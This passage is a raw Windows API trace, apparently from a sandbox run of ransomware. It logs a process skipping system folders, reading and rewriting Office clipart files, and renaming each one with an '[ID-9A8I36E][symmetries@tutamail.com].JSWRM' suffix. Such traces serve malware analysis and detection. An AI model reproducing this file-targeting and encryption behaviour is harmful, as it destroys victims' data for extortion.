returned -1 [0087.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197979.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197979.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0197979.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197979.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197979.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0197979.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.329] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40230) returned 1 [0087.329] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d20) returned 0x24d210 [0087.329] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9d20, lpOverlapped=0x0) returned 1 [0087.335] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.335] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9d20, lpOverlapped=0x0) returned 1 [0087.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.336] CloseHandle (hObject=0x314) returned 1 [0087.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0087.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0087.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.337] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x668c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0197983.WMF", cAlternateFileName="")) returned 1 [0087.337] lstrcmpiW (lpString1="J0197983.WMF", lpString2=".") returned 1 [0087.337] lstrcmpiW (lpString1="J0197983.WMF", lpString2="..") returned 1 [0087.337] lstrcmpiW (lpString1="J0197983.WMF", lpString2="...") returned 1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="windows") returned -1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="recovery") returned -1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="perflogs") returned -1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="documents and settings") returned 1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="system volume information") returned -1 [0087.338] lstrcmpiW (lpString1="J0197983.WMF", lpString2="msocache") returned -1 [0087.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197983.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197983.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0197983.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197983.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0197983.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0197983.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0087.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.339] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26252) returned 1 [0087.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6680) returned 0x24d210 [0087.340] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6680, lpOverlapped=0x0) returned 1 [0087.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.343] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6680, lpOverlapped=0x0) returned 1 [0087.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.343] CloseHandle (hObject=0x314) returned 1 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0087.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0087.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0087.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.344] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.345] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x849c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198016.WMF", cAlternateFileName="")) returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2=".") returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="..") returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="...") returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="windows") returned -1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="recovery") returned -1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="perflogs") returned -1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="documents and settings") returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="system volume information") returned -1 [0087.345] lstrcmpiW (lpString1="J0198016.WMF", lpString2="msocache") returned -1 [0087.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198016.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198016.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198016.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198016.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198016.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198016.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.346] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33948) returned 1 [0087.346] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8490) returned 0x24d210 [0087.346] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8490, lpOverlapped=0x0) returned 1 [0087.350] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.350] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8490, lpOverlapped=0x0) returned 1 [0087.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.351] CloseHandle (hObject=0x314) returned 1 [0087.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0087.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0087.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0087.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0087.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.352] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.353] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5cae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198020.WMF", cAlternateFileName="")) returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2=".") returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="..") returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="...") returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="windows") returned -1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="recovery") returned -1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="perflogs") returned -1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="documents and settings") returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="system volume information") returned -1 [0087.353] lstrcmpiW (lpString1="J0198020.WMF", lpString2="msocache") returned -1 [0087.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198020.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198020.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198020.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198020.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, 